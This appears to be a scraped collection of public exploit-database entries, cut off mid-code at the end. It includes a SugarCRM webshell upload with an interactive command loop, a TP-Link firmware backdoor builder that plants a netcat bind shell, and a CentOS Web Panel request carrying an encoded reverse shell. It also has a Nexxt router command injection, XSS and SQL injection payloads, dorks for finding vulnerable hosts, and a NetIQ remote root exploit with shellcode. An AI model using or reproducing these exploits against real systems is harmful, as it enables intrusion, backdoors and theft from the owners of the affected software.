ISHACK AI BOT

#!/usr/bin/env python # Exploit Title: SugarCRM 12.2.0 - Remote Code Execution (RCE) # Exploit Author: sw33t.0day # Vendor Homepage: https://www.sugarcrm.com # Version: all commercial versions up to 12.2.0 # Dorks: # https://www.google.com/search?q=site:sugarondemand.com&filter=0 # https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php # https://www.shodan.io/search?query=http.title:"SugarCRM" # https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM" # https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com" import base64, re, requests, sys, uuid requests.packages.urllib3.disable_warnings() if len(sys.argv) != 2: sys.exit("Usage: %s [URL]" % sys.argv[0]) print "[+] Sending authentication request" url = sys.argv[1] + "/index.php" session = {"PHPSESSID": str(uuid.uuid4())} params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1} requests.post(url, cookies=session, data=params, verify=False) print "[+] Uploading PHP shell\n" png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC" upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtml params = {"module": "EmailTemplates", "action": "AttachFiles"} requests.post(url, cookies=session, data=params, files=upload, verify=False) url = sys.argv[1] + "/cache/images/sweet.phar" while True: cmd = raw_input("# ") res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False) res = re.search("#####(.*)#####", res.text, re.DOTALL) if res: print res.group(1) else: sys.exit("\n[+] Failure!\n")

# Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS) # Exploit Author: Mohammed A.Siledar # Author Company : reprisesoftware # Version: rlm.v14.2BL4 # Vendor home page : https://reprisesoftware.com # Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe # Authentication Required: No # CVE : CVE-2022-30519 # Tested on: Windows 10 # Proof Of Concept: http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E Best Regards.

Exploit Title: Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion Vendor: Hughes Network Systems, LLC Product web page: https://www.hughes.com Affected version: HX200 v8.3.1.14 HX90 v6.11.0.5 HX50L v6.10.0.18 HN9460 v8.2.0.48 HN7000S v6.9.0.37 Summary: The HX200 is a high-performance satellite router designed to provide carrier-grade IP services using dynamically assigned high-bandwidth satellite IP connectivity. The HX200 satellite router provides flexible Quality of Service (QoS) features that can be tailored to the network applications at each individual remote router, such as Adaptive Constant Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing. With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT, and DNS Server/Relay functionality, together with a high-performance satellite modem, the HX200 is a full-featured IP Router with an integrated high-performance satellite router. The HX200 enables high- performance IP connectivity for a variety of applications including cellular backhaul, MPLS extension services, virtual leased line, mobile services and other high-bandwidth solutions. Desc: The router contains a cross-frame scripting via remote file inclusion vulnerability that may potentially be exploited by malicious users to compromise an affected system. This vulnerability may allow an unauthenticated malicious user to misuse frames, include JS/HTML code and steal sensitive information from legitimate users of the application. Tested on: WindWeb/1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5743 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php 23.12.2022 -- snippet:///XFSRFI // // Hughes Satellite Router RFI/XFS PoC Exploit // by lqwrm 2022 // //URL http://TARGET/fs/dynaform/speedtest.html //Reload target //window.location.reload() console.log("Loading Broadband Satellite Browsing Test"); //Add cross-frame file include (http only) AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg"); console.log("Calling StartTest()"); StartTest() //console.log("Calling DoTest()"); //DoTest() //Unload weapon //document.getElementById("URLList").remove();

# !/usr/bin/python3 # Exploit Title: TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Tobias Müller # Date: 2022-12-01 # Version: TL-WR902AC(EU)_V3_0.9.1 Build 220329 # Vendor Homepage: https://www.tp-link.com/ # Tested On: TP-Link TL-WR902AC # Vulnerability Description: Remote Code Execution via importing malicious firmware file # CVE: CVE-2022-48194 # Technical Details: https://github.com/otsmr/internet-of-vulnerable-things TARGET_HOST = "192.168.0.1" ADMIN_PASSWORD = "admin" TP_LINK_FIRMWARE_DOWNLOAD = "https://static.tp-link.com/upload/firmware/2022/202208/20220803/TL-WR902AC(EU)_V3_220329.zip" import requests import os import glob import subprocess import base64, os, hashlib from Crypto.Cipher import AES, PKCS1_v1_5 # pip install pycryptodome from Crypto.PublicKey import RSA from Crypto.Util.Padding import pad for program in ["binwalk", "fakeroot", "unsquashfs", "mksquashfs"]: if "not found" in subprocess.check_output(["which", program]).decode(): print(f"[!] need {program} to run") exit(1) class WebClient(object): def __init__(self, host, password): self.host = "http://" + host self.password = password self.password_hash = hashlib.md5(('admin%s' % password.encode('utf-8')).encode('utf-8')).hexdigest() self.aes_key = "7765636728821987" self.aes_iv = "8775677306058909" self.session = requests.Session() crypto_data = self.cgi_basic("?8", "[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n").text self.sign_rsa_e = int(crypto_data.split("\n")[1].split('"')[1], 16) self.sign_rsa_n = int(crypto_data.split("\n")[2].split('"')[1], 16) self.seq = int(crypto_data.split("\n")[3].split('"')[1]) self.jsessionid = self.get_jsessionid() def get_jsessionid(self): post_data = f"8\r\n[/cgi/login#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nusername=admin\r\npassword={self.password}\r\n" self.get_encrypted_request_data(post_data, True) return self.session.cookies["JSESSIONID"] def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): cipher = AES.new(aes_key.encode('utf-8'), AES.MODE_CBC, iv=aes_iv.encode('utf-8')) plaintext_padded = pad(plaintext, aes_block_size) return cipher.encrypt(plaintext_padded) def rsa_encrypt(self, n, e, plaintext): public_key = RSA.construct((n, e)).publickey() encryptor = PKCS1_v1_5.new(public_key) block_size = int(public_key.n.bit_length() / 8) - 11 encrypted_text = '' for i in range(0, len(plaintext), block_size): encrypted_text += encryptor.encrypt(plaintext[i:i + block_size]).hex() return encrypted_text def get_encrypted_request_data(self, post_data, is_login: bool): encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, post_data.encode('utf-8')) encrypted_data = base64.b64encode(encrypted_data).decode() self.seq += len(encrypted_data) signature = f"h={self.password_hash}&s={self.seq}" if is_login: signature = f"key={self.aes_key}&iv={self.aes_iv}&" + signature encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature.encode('utf-8')) body = f"sign={encrypted_signature}\r\ndata={encrypted_data}\r\n" return self.cgi_basic("_gdpr", body) def cgi_basic(self, url: str, body: str): res = self.session.post(f"{self.host}/cgi{url}", data=body, headers={ "Referer": "http://192.168.0.1/" }) if res.status_code != 200: print(res.text) raise ValueError("router not reachable") return res def cmd(command): print("[*] running " + command) os.system(command) def build_backdoor(): if os.path.isdir("./tp_tmp"): cmd("rm -r -f ./tp_tmp") os.mkdir("./tp_tmp") os.chdir('./tp_tmp') print("[*] downloading firmware") res = requests.get(TP_LINK_FIRMWARE_DOWNLOAD) with open("firmware.zip", "wb") as f: f.write(res.content) print("[*] downloading netcat") #res = requests.get(NETCAT_PRECOMPILED_FILE) #with open("netcat", "wb") as f: # f.write(res.content) if os.path.isfile("netcat"): print("[!] netcat not found") exit() cmd('unzip firmware.zip') filename = glob.glob("TL-*.bin")[0] cmd(f"mv '{filename}' firmware.bin") cmd('binwalk --dd=".*" firmware.bin') cmd('fakeroot -s f.dat unsquashfs -d squashfs-root _firmware.bin.extracted/160200') with open("./squashfs-root/etc/init.d/back", "w") as f: f.write(""" #!/bin/sh while true; do netcat -l -p 3030 -e /bin/sh sleep 5 done """) cmd("chmod +x ./squashfs-root/etc/init.d/back") with open("./squashfs-root/etc/init.d/rcS", "r+") as f: content = f.read() content = content.replace("cos &", "/etc/init.d/back &\ncos &") f.write(content) cmd("cp netcat ./squashfs-root/usr/bin/") cmd("chmod +x ./squashfs-root/usr/bin/netcat") cmd("fakeroot -i f.dat mksquashfs squashfs-root backdoor.squashfs -comp xz -b 262144") size = subprocess.check_output(["file", "backdoor.squashfs"]).decode() offset = int(size.split(" ")[9]) + 1442304 cmd("dd if=firmware.bin of=backdoor.bin bs=1 count=1442304") cmd("dd if=backdoor.squashfs of=backdoor.bin bs=1 seek=1442304") cmd(f"dd if=firmware.bin of=backdoor.bin bs=1 seek={offset} skip={offset}") os.chdir('../') cmd(f"mv ./tp_tmp/backdoor.bin .") cmd("rm -r -f ./tp_tmp") def upload_backdoor(): wc = WebClient(TARGET_HOST, ADMIN_PASSWORD) print("[*] uploading backdoor") files = { 'filename': open('backdoor.bin','rb') } re_upload = requests.post("http://" + TARGET_HOST + "/cgi/softup", cookies={ "JSESSIONID": wc.jsessionid }, headers={ "Referer": "http://192.168.0.1/mainFrame.htm" }, files=files) if re_upload.status_code != 200 or "OK" not in re_upload.text: print("[!] error") exit(1) print("[*] success!") print("\nWait for router restart, then run:") print("nc 192.168.0.1 3030") build_backdoor() upload_backdoor()

# Exploit Title: Apache 2.4.x - Buffer Overflow # Date: Jan 2 2023 # Exploit Author: Sunil Iyengar # Vendor Homepage: https://httpd.apache.org/ # Software Link: https://archive.apache.org/dist/httpd/ # Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51 # Tested on: (Server) Kali, (Client) MacOS Monterey # CVE : CVE-2021-44790 import requests #Example "http(s)://<hostname>/process.lua" url = "http(s)://<hostname>/<luafile>" payload = "4\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n0\r\n4\r\n" headers = { 'Content-Type': 'multipart/form-data; boundary=4' } #Note1: The value for boundary=4, in the above example, is arbitrary. It can be anything else like 1. # But this has to match with the values in Payload. #Note2: The form data as shown above returns the response as "memory allocation error: block too big". # But one can change the payload to name=\"name\"\r\n\r\n\r\n4\r\n" and not get the error but on the lua module overflows # 3 more bytes during memset response = requests.request("POST", url, headers=headers, data=payload) print(response.text) #Response returned is #<h3>Error!</h3> #<pre>memory allocation error: block too big</pre>

[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE) [+] Centos Web Panel 7 - < 0.9.8.1147 [+] Affected Component ip:2031/login/index.php?login=$(whoami) [+] Discoverer: Numan Türle @ Gais Cyber Security [+] Author: Numan Türle [+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194 [+] CVE: CVE-2022-44877 Description -------------- Bash commands can be run because double quotes are used to log incorrect entries to the system. Video Proof of Concept -------------- https://www.youtube.com/watch?v=kiLfSvc1SYY Proof of concept: -------------- POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1 Host: 10.13.37.10:2031 Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82 Content-Length: 40 Origin: https://10.13.37.10:2031 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://10.13.37.10:2031/login/index.php?login=failed Accept-Encoding: gzip, deflate Accept-Language: en Connection: close username=root&password=toor&commit=Login -------------- Solution -------- Upgrade to CWP7 current version

# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio= n (RCE) (Authenticated) # Date: 19/10/2022 # Exploit Author: Yerodin Richards # Vendor Homepage: https://www.nexxtsolutions.com/ # Version: 42.103.1.5095 # Tested on: ARN02304U8 # CVE : CVE-2022-44149 import requests import base64 router_host =3D "http://192.168.1.1" username =3D "admin" password =3D "admin" def main(): send_payload("&telnetd") print("connect to router using: `telnet "+router_host.split("//")[1]+ "= ` using known credentials") pass def gen_header(u, p): return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii") def get_cookie(header): url =3D router_host+"/login" params =3D {"arg":header, "_n":1} resp=3Drequests.get(url, params=3Dparams) =20 def send_payload(payload): url =3D router_host+"/goform/sysTools" headers =3D {"Authorization": "Basic {}".format(gen_header(username, pa= ssword))} params =3D {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK= "} requests.post(url, headers=3Dheaders, data=3Dparams) if __name__ =3D=3D '__main__': main()

## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS) ## Author: nu11secur1ty ## Date: 01.05.2023 ## Vendor: https://aimone-video-converter.software.informer.com/, http://www.aimonesoft.com/ ## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0 ## Reference: ## Description: The AimOne Video Converter V2.04 Build 103 suffers from buffer overflow and local Denial of Service. The registration form is not working properly and crashes the video converter. When the attacker decides to register the product. This can allow him to easily crack the software and do more bad things it depending on the case. ## STATUS: HIGH Vulnerability - CRITICAL [+] Exploit: ```Python #!/usr/bin/python # nu11secur1ty print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer Overflow exploit builder...\n") input("Press any key to build the exploit...\n") buffer = "\x41" * 7000 try: f=open("PoC.txt","w") print("[+] Creating %s bytes exploit payload.." %len(buffer)) f.write(buffer) f.close() print("[+] The PoC file was created!") except: print("File cannot be created") ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103) ## Proof and Exploit: [href](https://streamable.com/v1hvbf) ## Time spent `00:35:00` ## Writing an exploit `00:15:00` -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: PMB 7.4.6 - SQL Injection # Google Dork: inurl:opac_css # Date: 2023-01-06 # Exploit Author: str0xo DZ (Walid Ben) https://github.com/Str0xo # Vendor Homepage: http://www.sigb.net # Software Link: http://forge.sigb.net/redmine/projects/pmb/files # Affected versions : <= 7.4.6 -==== Software Description ====- PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs. PMB is based on web technology. This is what we sometimes call a 'web-app'. PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language. The main functions of PMB are : * Supporting the UNIMARC format * Authorities management (authors, publishers, series, subjects...) * Management of loans, holds, borrowers... * A user-friendly configuration * The ability to import full bibliographic records * A user-friendly OPAC integrating a browser * Loans management with a module designed to serve even the very small establishments * Serials management * Simple administration procedures that can be handled easily even by the library staff... -==== Vulnerability ====- URL: https://localhost/opac_css/ajax.php?categ=storage&datetime=undefined&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined Parameter: id -==== Vulnerability Details ====- URL encoded GET input id was set to if(now()=sysdate(),sleep(6),0) Tests performed: if(now()=sysdate(),sleep(15),0) => 15.43 if(now()=sysdate(),sleep(6),0) => 6.445 if(now()=sysdate(),sleep(15),0) => 15.421 if(now()=sysdate(),sleep(3),0) => 3.409 if(now()=sysdate(),sleep(0),0) => 0.415 if(now()=sysdate(),sleep(0),0) => 0.413 if(now()=sysdate(),sleep(6),0) => 6.41 Using SQLMAP : sqlmap -u "http://localhost/pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1&module=ajax&sub=save&token=undefined" -p "id"

# Exploit Title: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS) # Google Dork: N/A # Date: 2/1/2023 # Exploit Author: Rian Saaty # Vendor Homepage: https://yui.github.io/yui2/ # Software Link: https://yui.github.io/yui2/ # Version: 2.8.2 # Tested on: MacOS, WindowsOS, LinuxOS # CVE : CVE-2022-48197 The YUI2 has a lot of reflected XSS vulnerabilities in pretty much most files. A sample of the vulnerable files along with the exploit can be found here: https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E Twitter: @Ryan_412_

/* # Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit # Date: Jun 2007 # Exploit Author: mu-b # Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management # Version: All # Tested on: Windows / Solaris x86/SPARC # CVE : 0day * endpoint-pown-uni.c * * Copyright (c) 2007 by <[email protected]> * * NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit * by mu-b - Jun 2007 * * $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $ * * - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32) * (Revised: December, 2012) * NetIQ Performance Endpoint 5.1.15541 (win32) * (Revised: December, 2012) * NetIQ Performance Endpoint 5.1.15368 (win32) * (Revised: December, 2012) * NetIQ Performance Endpoint 5.1 (win32) * NetIQ Performance Endpoint 4.2 (freebsd-x86) * NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack) * (Revised: May 23, 2006) * * * "No executable code (like Java or Visual Basic) is sent. There is no way * to do something like 'run this command.' 100,000’s of endpoints have been * installed worldwide without incident." * * "Endpoints do rigorous internal validation. For example, endpoints are not * susceptible to 'buffer overrun' attacks used by hackers." * - https://tinyurl.com/lgmblyj * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! */ #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <assert.h> #include <ifaddrs.h> #include <limits.h> #include <net/if.h> #include <netinet/in.h> #include <netdb.h> #include <signal.h> #include <string.h> #include <sys/ioctl.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #define IPV4_BUFLEN 16 /* "255.255.255.255\0" */ #define PORT_SHELL 10000 #define ENDPT_TCP_PORT 10115 #define ENDPT_PKTMAX 0x1388 static char ppkt_buf1[] = "\x06" /* ENDPT_COMMAND_SETUP_E1 */ "\x07\x14\x43\x1A" /* verify_get_id (1) */ "\x00\x22" /* copyright_smart_compare */ "Copyright Ganymede Software Inc." "\x00\x03" /* */ "\xff" /* code_convert_from_line */ "\x00\x03" /* */ "\xff" /* code_convert_from_line */ "\x00" /* */ "\x00\x02" /* len < 0x80 */ "\x00\x03" /* len < 0x40 */ "\x00" /* len < 0x40 */ "\x41\x41\x41\x41\x41\x41\x41\x41" /* */ "\x41\x41\x41\x41\x41\x41\x41\x41" /* */ "\x02" /* protocol */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x41\x41\x41\x41\x41\x41" /* */ "\x00\x00\x00\x01" /* */ "\x00\x00\x00\x02" /* 218h */ "\x00" /* */ "\x01" /* 1ACh */ "\x00\x00" /* */ "\x00" /* 254h */ "\x02" /* protocol */ "\x00\x03" /* len < 0x40 */ "\x00"; /* */ static char ppkt_buf1_end[] = "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00"; /* */ static char ppkt_buf2[] = "\x06" /* ENDPT_COMMAND_SETUP_E1 */ "\x07\x14\x43\x1A" /* verify_get_id (1) */ "\x00\x22" /* copyright_smart_compare */ "Copyright Ganymede Software Inc." "\x00\x03" /* */ "\xff" /* code_convert_from_line */ "\x00\x03" /* */ "\xff" /* code_convert_from_line */ "\x02" /* protocol */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x69" /* 210h */ "\x00\x00\x00\x69" /* var_C */ "\x00\x02" /* */ "\x00\x00\x00\x69" /* var_C */ "\x00\x00\x00\x69" /* 218h */ "\x69" /* */ "\x01" /* 1ACh */ "\x00\x00" /* */ "\x69" /* 254h */ "\x02" /* protocol */ "\x00\x03" /* len < 0x40 */ "\x00"; /* */ static char ppkt_buf2_end[] = "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x69" /* 0A8h */ "\x00\x03" /* len < 0x40 */ "\x00"; /* */ static char cpkt_buf1[] = "\x07" "AAAA"; static char cpkt_buf2[] = "\x38" "\x00\x04" "AAAA"; static char x86_evil_len[] = "\x11\xc0"; /* adc eax, eax */ #define X86_NOP_BYTE 0x90 /* nop */ static char sparc_evil_len[] = "\x10\x80\x00\x3c"; /* ba */ static char sparc_nop[] = "\x01\x00\x00\x00"; /* nop */ static char hammer_buf[] = "\x00\x25\x38" "\x00\x20" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00"; static char win32_x86_bind[] = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e" "\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5" "\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1" "\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3" "\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02" "\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1" "\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1" "\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a" "\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa" "\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28" "\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79" "\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb" "\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42" "\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63" "\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d" "\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a" "\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07" "\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5" "\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b" "\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa" "\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a" "\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a"; static char freebsd_x86_bind[] = "\x6a\x61\x58\x99\x52\x68\x10\x02\x27\x10\x89\xe1\x52\x42\x52\x42" "\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0" "\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a" "\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68" "\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80"; static char solaris_sparc_bind[] = "\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b" "\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08" "\xd0\x23\xbf\xf8\x21\x00\x00\x89\xa0\x14\x23\x10\xe0\x23\xbf\xf0" "\xc0\x23\xbf\xf4\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xe8" "\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x10\x20\x01\x82\x10\x20\xe9" "\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x1a\x40\x09\x94\x12\x40\x09" "\x82\x10\x20\xea\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x94\x10\x20\x03" "\x92\x10\x20\x09\x94\xa2\xa0\x01\x82\x10\x20\x3e\x91\xd0\x20\x08" "\x12\xbf\xff\xfc\xd0\x03\xbf\xf8\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a" "\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08" "\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b" "\x91\xd0\x20\x08"; static char solaris_x86_bind[] = "\xb8\xff\xff\xff\xff\xba\xfd\xff\xd8\xef\xf7\xd0\xf7\xd2\x50\x52" "\x89\xe7\x31\xdb\xf7\xe3\xb0\x02\x50\x52\x52\x50\x50\x50\xb0\xe6" "\xcd\x91\x93\x6a\x10\x57\x53\x52\xb0\xe8\xcd\x91\x52\x53\x52\xb0" "\xe9\xcd\x91\x52\x53\x6a\x02\xb0\xea\xcd\x91\x93\x92\x99\x59\x51" "\x52\xb0\x06\xcd\x91\x51\x6a\x09\x53\x52\xb0\x3e\xcd\x91\x83\xc4" "\x18\x49\x79\xeb\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x52\x53\x89\xe1\x52\x52\x51\x53\x52\xb0\x3b\xcd\x91"; #define NUM_TARGETS 7 #define ARCH_X86 0 #define ARCH_SPARC 1 struct target_t { const char *name; const char *zshell; const int zshell_len; const int zshell_pkt_len; const int fp_indx; const int fp_offset; const int arch; }; struct target_t targets[] = { { "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)", win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 }, { "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)", win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 }, { "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)", 